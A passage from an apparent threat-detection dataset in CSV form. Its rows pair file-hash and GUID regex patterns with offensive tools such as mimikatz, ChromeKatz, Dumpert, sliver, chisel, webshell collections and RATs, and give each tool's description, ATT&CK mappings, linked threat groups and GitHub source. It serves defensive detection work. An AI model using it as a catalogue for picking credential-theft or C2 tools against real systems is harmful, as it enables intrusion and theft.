- OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation 
tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file-analysis/MmNmZTNkNjgzMTNkNDdlNDczYWUxNDhiMGYxM2UzMjc6MTcyNDUyMDIwNg==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31201" "*9296e9e6240ac6f0af968a479f0d4ca8d71a6fa8850797a5b1600145fe93baec*",".{0,1000}9296e9e6240ac6f0af968a479f0d4ca8d71a6fa8850797a5b1600145fe93baec.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31202" "*929ca5f7728d5b18bdb5fae5862b9ad565e1aab9fe38c416760caf2b6867eefd*",".{0,1000}929ca5f7728d5b18bdb5fae5862b9ad565e1aab9fe38c416760caf2b6867eefd.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","31204" "*929cc2194f0dff4b6b8e7102e841253dfbdca6790f45e0f1165fbdbeeffc390a*",".{0,1000}929cc2194f0dff4b6b8e7102e841253dfbdca6790f45e0f1165fbdbeeffc390a.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","31205" 
"*929dbe39814a7b4acba0efe0a552840aeb1e9a5b1f8045be633e6fb68f4e2155*",".{0,1000}929dbe39814a7b4acba0efe0a552840aeb1e9a5b1f8045be633e6fb68f4e2155.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","31206" "*92ae97557e18ca810999fc05c18e3c6c75476444*",".{0,1000}92ae97557e18ca810999fc05c18e3c6c75476444.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","31210" "*92bc6c12e5ead3c0c0069b53bcca9c2f21b9f2e10f1e4a05ef1efcd25bcc70e9*",".{0,1000}92bc6c12e5ead3c0c0069b53bcca9c2f21b9f2e10f1e4a05ef1efcd25bcc70e9.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#filehash","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","31212" "*92c2dcbc529e4f81c4bc9aedfabc4361314ab0799a3fa56bc14750933cf207a3*",".{0,1000}92c2dcbc529e4f81c4bc9aedfabc4361314ab0799a3fa56bc14750933cf207a3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31215" 
"*92C5208E-DE76-49F9-B022-1A558C95B6DF*",".{0,1000}92C5208E\-DE76\-49F9\-B022\-1A558C95B6DF.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","31216" "*92c92547aac24ad94bb31551d0d8625c7e30c6b9e88ff542f2a87d9dcd4b08f5*",".{0,1000}92c92547aac24ad94bb31551d0d8625c7e30c6b9e88ff542f2a87d9dcd4b08f5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31218" "*92cc7e1364616744e3d3c5d0cfede29516c30da1aeeb5ce95329917814b331af*",".{0,1000}92cc7e1364616744e3d3c5d0cfede29516c30da1aeeb5ce95329917814b331af.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31220" "*92d262037522935fde4039ff17bdc6648c294519417e605477d78a9f0e84f20a*",".{0,1000}92d262037522935fde4039ff17bdc6648c294519417e605477d78a9f0e84f20a.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","31223" "*92d8a70870f02f8bb284a317c9801cc774dfabc2660efea327049289f5137376*",".{0,1000}92d8a70870f02f8bb284a317c9801cc774dfabc2660efea327049289f5137376.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit 
low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","31224" "*92e355ef8f0242891884e4bc51d2422852fdb08430c36a7a9f8f384bfaf975d9*",".{0,1000}92e355ef8f0242891884e4bc51d2422852fdb08430c36a7a9f8f384bfaf975d9.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","31228" "*92ecee084ef8dd59561826895fd8aef0e5db918ad05940aabba3999be223ba4f*",".{0,1000}92ecee084ef8dd59561826895fd8aef0e5db918ad05940aabba3999be223ba4f.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","31230" "*92f28921ca0db8a0c7c1a4e18a9e9dea53fdbd902b3d3ad67444f59a21a96d5c*",".{0,1000}92f28921ca0db8a0c7c1a4e18a9e9dea53fdbd902b3d3ad67444f59a21a96d5c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31231" "*92f93bcce51a5c4362dc6304cf01838f47bb274737bfd81e64e4aeb9c4eda895*",".{0,1000}92f93bcce51a5c4362dc6304cf01838f47bb274737bfd81e64e4aeb9c4eda895.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31234" "*9302e09f9f1856391bc218c2b7cdd898e8934f18efc31dd9b27f52b0e2d1812c*",".{0,1000}9302e09f9f1856391bc218c2b7cdd898e8934f18efc31dd9b27f52b0e2d1812c.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","31236" 
"*93052e4a139b6f66aed0be356b47c2816bf121445df85ca5369d024fc06c6f5f*",".{0,1000}93052e4a139b6f66aed0be356b47c2816bf121445df85ca5369d024fc06c6f5f.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","31238" "*9306e6c0e310b8146db022c3387eb9bb6076a13fb73e45ae98927b3dfb43872b*",".{0,1000}9306e6c0e310b8146db022c3387eb9bb6076a13fb73e45ae98927b3dfb43872b.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","31239" "*932450a89ef9c5b089ddfb917b49e1e8cd3e001133081f0baedffaf0039f004b*",".{0,1000}932450a89ef9c5b089ddfb917b49e1e8cd3e001133081f0baedffaf0039f004b.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","31242" "*932e9575f1cda389162af613cfad2ec48f9fedd7039e09aec2b349ca2a9f663e*",".{0,1000}932e9575f1cda389162af613cfad2ec48f9fedd7039e09aec2b349ca2a9f663e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31246" "*93308034f5c3b6c30fa3251382e31f270606f94cb81bcb028edb7d68cd87e73c*",".{0,1000}93308034f5c3b6c30fa3251382e31f270606f94cb81bcb028edb7d68cd87e73c.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","31247" "*93317a49d4e0065e7bfa8c751e5f5d86087ef4c09c4f5d883dd9d9a69871f95d*",".{0,1000}93317a49d4e0065e7bfa8c751e5f5d86087ef4c09c4f5d883dd9d9a69871f95d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","31248" "*93362035A00C104A84F3B17E7B499CD700000000020000000000000000000000C00A1281B535EF499*",".{0,1000}93362035A00C104A84F3B17E7B499CD700000000020000000000000000000000C00A1281B535EF499.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","#filehash","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","31249" 
"*933a32bee8a72a28653b56cb9b013f67da6510d4ad10c21333a6e930d385fb82*",".{0,1000}933a32bee8a72a28653b56cb9b013f67da6510d4ad10c21333a6e930d385fb82.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31250" "*933f98396260d2400250b8bd4897ab13bf4399fa276fa1e20391a446da68b4cc*",".{0,1000}933f98396260d2400250b8bd4897ab13bf4399fa276fa1e20391a446da68b4cc.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","31252" "*9341205B-AEE0-483B-9A80-975C2084C3AE*",".{0,1000}9341205B\-AEE0\-483B\-9A80\-975C2084C3AE.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","31253" "*9348d115c278c8cdd93b04c7da312199c6c93c624812b77168fba9f77a3b6ecc*",".{0,1000}9348d115c278c8cdd93b04c7da312199c6c93c624812b77168fba9f77a3b6ecc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31254" "*934cdd2196c8892b2587ae94b5ae02e3c51ebf73c4c91b43b081d8add9ea381a*",".{0,1000}934cdd2196c8892b2587ae94b5ae02e3c51ebf73c4c91b43b081d8add9ea381a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31255" "*93520c6aabfdb463c5b74b0409356813b4222190b131664a8343ca0b1b4e7d29*",".{0,1000}93520c6aabfdb463c5b74b0409356813b4222190b131664a8343ca0b1b4e7d29.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - 
T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","31257" "*93567450bfc7916e8468e4c6c0d1792195fe70e0138461f98c75ca6c5d2f76a1*",".{0,1000}93567450bfc7916e8468e4c6c0d1792195fe70e0138461f98c75ca6c5d2f76a1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31258" "*935D33C5-62F1-40FE-8DB0-46B6E01342FB*",".{0,1000}935D33C5\-62F1\-40FE\-8DB0\-46B6E01342FB.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","31260" "*93642234b0a16f0af2ebc99eb13287ab9b518bc5784358ee7d8166d3ae254560*",".{0,1000}93642234b0a16f0af2ebc99eb13287ab9b518bc5784358ee7d8166d3ae254560.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31261" "*9372fc352f24f6f58fe28bd7d0ff4cdc3a384275c7ddd6f76c4fa40eea0a94b2*",".{0,1000}9372fc352f24f6f58fe28bd7d0ff4cdc3a384275c7ddd6f76c4fa40eea0a94b2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","31262" "*9374f1f361c8c664f4527cc9e43e277fddab0bfc032e254fec9b22405210f808*",".{0,1000}9374f1f361c8c664f4527cc9e43e277fddab0bfc032e254fec9b22405210f808.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#filehash","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","31263" "*9379882ba3635ecf7bbd140a313245e551acb1a702b1e5e514eb61bf76260a83*",".{0,1000}9379882ba3635ecf7bbd140a313245e551acb1a702b1e5e514eb61bf76260a83.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit 
- Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","31264" "*937d40d109c7b0aa6246639a8f3d5893c6dd62dec94816b2cf5a0e89be2be325*",".{0,1000}937d40d109c7b0aa6246639a8f3d5893c6dd62dec94816b2cf5a0e89be2be325.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31265" "*9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff*",".{0,1000}9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","31267" "*9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff*",".{0,1000}9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31268" "*93832ebdb2391eeda156e8b58a0a5af6ed3897b5d9a90b3d9e346a460f76dad8*",".{0,1000}93832ebdb2391eeda156e8b58a0a5af6ed3897b5d9a90b3d9e346a460f76dad8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31269" "*938a94d61186b75496c550611419474deb34d8038db6e1034a8919cebc898781*",".{0,1000}938a94d61186b75496c550611419474deb34d8038db6e1034a8919cebc898781.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","31270" "*938e42fe50266db91748e07d22a54e73c9d5d25d81b5d50e475f3fc6e09d1cb1*",".{0,1000}938e42fe50266db91748e07d22a54e73c9d5d25d81b5d50e475f3fc6e09d1cb1.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential 
Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","31271" "*9399f2fe7c63989641f911a519930e9139ff4987c0bdaee56c25d68c4c64a63b*",".{0,1000}9399f2fe7c63989641f911a519930e9139ff4987c0bdaee56c25d68c4c64a63b.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","31272" "*93a50251b09b5dfc88fa583099e0724815099269561ca070dc823b4dd0be536d*",".{0,1000}93a50251b09b5dfc88fa583099e0724815099269561ca070dc823b4dd0be536d.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","31273" "*93a9468ea39b4bb15148e4845593d36f0137c5a23de9045dc5596a302f873e16*",".{0,1000}93a9468ea39b4bb15148e4845593d36f0137c5a23de9045dc5596a302f873e16.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","31274" "*93ade5b0b20ac4c950f3610f96c9f76a8cab972e793ed6364a2f2276965690f8*",".{0,1000}93ade5b0b20ac4c950f3610f96c9f76a8cab972e793ed6364a2f2276965690f8.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. 
an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","31276" "*93b20a7961c9986baf181d1a1635b33b87735f75d046c6dcdd5d412a55832d6f*",".{0,1000}93b20a7961c9986baf181d1a1635b33b87735f75d046c6dcdd5d412a55832d6f.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","#filehash","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","31278" "*93b7d9be5712edde42725cbe09bed22e9b0d64123d2f535fe6807823c2214710*",".{0,1000}93b7d9be5712edde42725cbe09bed22e9b0d64123d2f535fe6807823c2214710.{0,1000}","offensive_tool_keyword","Malware 